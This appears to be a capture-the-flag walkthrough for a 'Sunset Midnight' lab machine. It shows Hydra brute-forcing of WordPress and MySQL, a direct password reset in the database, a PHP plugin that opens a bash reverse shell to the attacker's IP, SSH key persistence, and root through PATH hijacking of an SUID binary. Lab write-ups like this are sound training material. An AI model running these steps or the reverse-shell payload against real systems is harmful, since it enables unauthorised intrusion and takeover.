This is a very straightforward machine. There is a small rabbithole right at the start with the Simply Poll plugin, though.
In this box, we will be tackling:
- Weird Hydra results.
- Resetting WordPress passwords through the database.
- Getting a reverse shell using a WordPress “plugin”.
- Exploiting an SUID binary
1. Preliminary NMAP Scan
sudo nmap -sC -sV -oN nmap.txt 192.168.32.9 -v
Port 80 is open, and the
robots.txt has an entry -
/wp-admin. This is most likely running WordPress. We also rarely see port 3306 open on a box. We definitely need to check that out as well.
2. WordPress Login
Let’s start with the website.
Nothing much to see here. Let’s try to bruteforce
hydra -l admin -P /usr/share/wordlists/rockyou.txt sunset-midnight http-post-form "/wp-admin:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username"
Hydra gives us a bunch of credentials, but none of them work. Let’s move on to the SQL server on port 3306. Same thing, we are going to try to bruteforce this again with
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://sunset-midnight
We got a hit -
root:robert. Let’s login.
mysql -u 'root' -p -h 192.168.32.9
Let’s do a basic enumeration of databases.
select * from information_schema.schemata;
Now, let’s see what’s inside
select table_name from information_schema.tables where table_schema='wordpress_db';
Alright, seems like we have a users table. Let’s see if we can’t find some passwords.
use wordpress_db; select * from wp_users; select user_login,user_pass from wp_users;
Let’s try to crack the hash with
sudo john --wordlist:/usr/share/wordlists/rockyou.txt wp-admin.hash sudo john --show wp-admin.hash
No luck here, so let’s try resetting the password to
admin in the database directly.
update wp_users set user_pass = md5('admin') where id=1 limit 1;
Now we can try to login to
And we’re in.
3. WordPress Plugin Reverse Shell
Now that we’re in, we can try to get a reverse shell going through WordPress plugins. Let’s create the following PHP file as our “plugin”, then zip it.
<?php /** * Plugin Name: abcdefg * Author: hijklmnop */ shell_exec(bash -c 'bash -i >& /dev/tcp/192.168.32.4/8000 0>&1); ?>
7z a rev.zip rev.php
Now we can upload the plugin, setup a netcat listener on port 8000, then activate the plugin to trigger the reverse shell.
4. Pivoting to User
Since we’re logged on as
www-data, let’s take a look at
/etc/passwd to determine who we need to pivot to.
Let’s see if we can’t pivot to
jose. We can automatically enumerate this machine with
linpeas.sh, so let’s upload and run that.
We got some potential credentials in
jose:645dc5a8871d2a4269d4cbe23f6ae103. Let’s try to
jose using the credentials.
Now we’re in. Let’s grab the user flag first.
Next, for a more permanent foothold, we will generate a SSH key with
Now that we have generated the private and public key pair, we need to copy and paste the contents of
Let’s log back into SSH using the private key.
ssh email@example.com -i ./keys/id_rsa
5. Exploiting SUID to Root
Let’s upload and run
In the output, we see a file,
/usr/bin/status, which has SUID/SGID set. This file is most likely a custom binary. Running the file produces an error.
Let’s run strings on it to roughly see what it does.
It looks like it’s trying to run the
service binary which doesn’t exist on this box. We can create our own
/home/jose to execute
/bin/bash as root with the follwing script.
#!/bin/bash bash -c /bin/bash
For this to work, we will also need to add
/home/jose to the
$PATH environment variable.
Next, we can run
which service to verify that the script will be run when executing
Now, let’s run
/usr/bin/status and get a root shell.